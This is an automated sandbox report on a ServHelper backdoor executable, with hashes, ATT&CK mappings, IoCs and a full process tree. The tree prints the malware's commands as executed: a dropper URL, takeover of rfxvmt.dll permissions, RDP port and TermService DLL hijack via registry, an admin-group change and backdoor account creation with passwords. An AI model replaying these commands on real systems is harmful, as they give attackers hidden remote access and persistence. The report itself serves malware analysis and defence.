servhelper | b46a19568e377c2e413e2b6ac5afce64e2491cf5ef10509af3ef08d1a59d416d

Analysis

max time kernel
127s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
20-04-2022 13:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b46a19568e377c2e413e2b6ac5afce64e2491cf5ef10509af3ef08d1a59d416d.exe
Size

3.4MB
MD5

7828a5c6e3657985e9225aa6a368bb0d
SHA1

3985616152a24f2d7f2007114a7c4d8894b26719
SHA256

b46a19568e377c2e413e2b6ac5afce64e2491cf5ef10509af3ef08d1a59d416d
SHA512

1a958f81002e54c1aae856d159eecb04cf01a0940c89bfabb672b877b9aa735c6239ff322a79baf042b4f42b7d11629c1ea8cab7e735d1ab95e4840f6229bfd1

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 10 IoCs

Processes:

powershell.exe

flow	pid	process
27	308	powershell.exe
29	308	powershell.exe
30	308	powershell.exe
31	308	powershell.exe
32	308	powershell.exe
34	308	powershell.exe
36	308	powershell.exe
38	308	powershell.exe
40	308	powershell.exe
42	308	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

1980 icacls.exe
2248 takeown.exe
2732 icacls.exe
3108 icacls.exe
3808 icacls.exe
2264 icacls.exe
4312 icacls.exe
4528 icacls.exe
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

pid	process
1980	icacls.exe
2248	takeown.exe
2732	icacls.exe
3108	icacls.exe
3808	icacls.exe
2264	icacls.exe
4312	icacls.exe
4528	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\Branding\mediasrv.png	upx
C:\Windows\Branding\mediasvc.png	upx

Loads dropped DLL 2 IoCs

Processes:

pid process

2420
2420
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exe

pid process

3108 icacls.exe
3808 icacls.exe
2264 icacls.exe
4312 icacls.exe
4528 icacls.exe
1980 icacls.exe
2248 takeown.exe
2732 icacls.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

pid	process
2420
2420

pid	process
3108	icacls.exe
3808	icacls.exe
2264	icacls.exe
4312	icacls.exe
4528	icacls.exe
1980	icacls.exe
2248	takeown.exe
2732	icacls.exe

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 18 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_otsmui31.y54.ps1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI339E.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI348A.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_nzsa1hnq.vpf.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI3528.tmp	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI345A.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI3508.tmp	powershell.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

372 432 WerFault.exe b46a19568e377c2e413e2b6ac5afce64e2491cf5ef10509af3ef08d1a59d416d.exe

pid	pid_target	process	target process
372	432	WerFault.exe	b46a19568e377c2e413e2b6ac5afce64e2491cf5ef10509af3ef08d1a59d416d.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4396 reg.exe
Runs net.exe

pid	process
4396	reg.exe

Script User-Agent 5 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	29	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	30	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1
HTTP User-Agent header	31	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	32	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1
HTTP User-Agent header	34	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exepowershell.exe

pid process

3080 powershell.exe
3080 powershell.exe
3080 powershell.exe
3080 powershell.exe
3080 powershell.exe
308 powershell.exe
308 powershell.exe
Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

668
668

pid	process
3080	powershell.exe
3080	powershell.exe
3080	powershell.exe
3080	powershell.exe
3080	powershell.exe
308	powershell.exe
308	powershell.exe

pid	process
668
668

Suspicious use of AdjustPrivilegeToken 15 IoCs

Processes:

powershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3080	powershell.exe
Token: SeRestorePrivilege	3108	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2976	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2976	WMIC.exe
Token: SeAuditPrivilege	2976	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2976	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2976	WMIC.exe
Token: SeAuditPrivilege	2976	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3572	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3572	WMIC.exe
Token: SeAuditPrivilege	3572	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3572	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3572	WMIC.exe
Token: SeAuditPrivilege	3572	WMIC.exe
Token: SeDebugPrivilege	308	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

b46a19568e377c2e413e2b6ac5afce64e2491cf5ef10509af3ef08d1a59d416d.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exe

description	pid	process	target process
PID 432 wrote to memory of 3080	432	b46a19568e377c2e413e2b6ac5afce64e2491cf5ef10509af3ef08d1a59d416d.exe	powershell.exe
PID 432 wrote to memory of 3080	432	b46a19568e377c2e413e2b6ac5afce64e2491cf5ef10509af3ef08d1a59d416d.exe	powershell.exe
PID 3080 wrote to memory of 204	3080	powershell.exe	csc.exe
PID 3080 wrote to memory of 204	3080	powershell.exe	csc.exe
PID 204 wrote to memory of 1408	204	csc.exe	cvtres.exe
PID 204 wrote to memory of 1408	204	csc.exe	cvtres.exe
PID 3080 wrote to memory of 2248	3080	powershell.exe	takeown.exe
PID 3080 wrote to memory of 2248	3080	powershell.exe	takeown.exe
PID 3080 wrote to memory of 2732	3080	powershell.exe	icacls.exe
PID 3080 wrote to memory of 2732	3080	powershell.exe	icacls.exe
PID 3080 wrote to memory of 3108	3080	powershell.exe	icacls.exe
PID 3080 wrote to memory of 3108	3080	powershell.exe	icacls.exe
PID 3080 wrote to memory of 3808	3080	powershell.exe	icacls.exe
PID 3080 wrote to memory of 3808	3080	powershell.exe	icacls.exe
PID 3080 wrote to memory of 2264	3080	powershell.exe	icacls.exe
PID 3080 wrote to memory of 2264	3080	powershell.exe	icacls.exe
PID 3080 wrote to memory of 4312	3080	powershell.exe	icacls.exe
PID 3080 wrote to memory of 4312	3080	powershell.exe	icacls.exe
PID 3080 wrote to memory of 4528	3080	powershell.exe	icacls.exe
PID 3080 wrote to memory of 4528	3080	powershell.exe	icacls.exe
PID 3080 wrote to memory of 1980	3080	powershell.exe	icacls.exe
PID 3080 wrote to memory of 1980	3080	powershell.exe	icacls.exe
PID 3080 wrote to memory of 1832	3080	powershell.exe	reg.exe
PID 3080 wrote to memory of 1832	3080	powershell.exe	reg.exe
PID 3080 wrote to memory of 4396	3080	powershell.exe	reg.exe
PID 3080 wrote to memory of 4396	3080	powershell.exe	reg.exe
PID 3080 wrote to memory of 4172	3080	powershell.exe	reg.exe
PID 3080 wrote to memory of 4172	3080	powershell.exe	reg.exe
PID 3080 wrote to memory of 2500	3080	powershell.exe	net.exe
PID 3080 wrote to memory of 2500	3080	powershell.exe	net.exe
PID 2500 wrote to memory of 4548	2500	net.exe	net1.exe
PID 2500 wrote to memory of 4548	2500	net.exe	net1.exe
PID 3080 wrote to memory of 1624	3080	powershell.exe	cmd.exe
PID 3080 wrote to memory of 1624	3080	powershell.exe	cmd.exe
PID 1624 wrote to memory of 1388	1624	cmd.exe	cmd.exe
PID 1624 wrote to memory of 1388	1624	cmd.exe	cmd.exe
PID 1388 wrote to memory of 4252	1388	cmd.exe	net.exe
PID 1388 wrote to memory of 4252	1388	cmd.exe	net.exe
PID 4252 wrote to memory of 4584	4252	net.exe	net1.exe
PID 4252 wrote to memory of 4584	4252	net.exe	net1.exe
PID 3080 wrote to memory of 4692	3080	powershell.exe	cmd.exe
PID 3080 wrote to memory of 4692	3080	powershell.exe	cmd.exe
PID 4692 wrote to memory of 2472	4692	cmd.exe	cmd.exe
PID 4692 wrote to memory of 2472	4692	cmd.exe	cmd.exe
PID 2472 wrote to memory of 4808	2472	cmd.exe	net.exe
PID 2472 wrote to memory of 4808	2472	cmd.exe	net.exe
PID 4808 wrote to memory of 4652	4808	net.exe	net1.exe
PID 4808 wrote to memory of 4652	4808	net.exe	net1.exe
PID 3712 wrote to memory of 492	3712	cmd.exe	net.exe
PID 3712 wrote to memory of 492	3712	cmd.exe	net.exe
PID 492 wrote to memory of 428	492	net.exe	net1.exe
PID 492 wrote to memory of 428	492	net.exe	net1.exe
PID 4356 wrote to memory of 3516	4356	cmd.exe	net.exe
PID 4356 wrote to memory of 3516	4356	cmd.exe	net.exe
PID 3516 wrote to memory of 1704	3516	net.exe	net1.exe
PID 3516 wrote to memory of 1704	3516	net.exe	net1.exe
PID 2496 wrote to memory of 5012	2496	cmd.exe	net.exe
PID 2496 wrote to memory of 5012	2496	cmd.exe	net.exe
PID 5012 wrote to memory of 1392	5012	net.exe	net1.exe
PID 5012 wrote to memory of 1392	5012	net.exe	net1.exe
PID 484 wrote to memory of 1780	484	cmd.exe	net.exe
PID 484 wrote to memory of 1780	484	cmd.exe	net.exe
PID 1780 wrote to memory of 1400	1780	net.exe	net1.exe
PID 1780 wrote to memory of 1400	1780	net.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\b46a19568e377c2e413e2b6ac5afce64e2491cf5ef10509af3ef08d1a59d416d.exe
"C:\Users\Admin\AppData\Local\Temp\b46a19568e377c2e413e2b6ac5afce64e2491cf5ef10509af3ef08d1a59d416d.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:432
- \??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
  -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3080
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aj3w4zld\aj3w4zld.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:204
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES39FC.tmp" "c:\Users\Admin\AppData\Local\Temp\aj3w4zld\CSC9A30BCF8E5F04F30B2E02A1122B3F242.TMP"
      4⤵
      PID:1408
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2248
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2732
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3108
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3808
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2264
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4312
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4528
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1980
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:1832
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:4396
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:4172
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2500
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:4548
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1624
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1388
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4252
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:4584
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4692
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2472
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4808
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:4652
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:4056
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:5052
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 480
  2⤵
  - Program crash
  PID:372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 432 -ip 432
1⤵
PID:4428

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:3712
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Ghar4f5 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:492
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
    3⤵
    PID:428

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Kbp89SBQ /add
1⤵
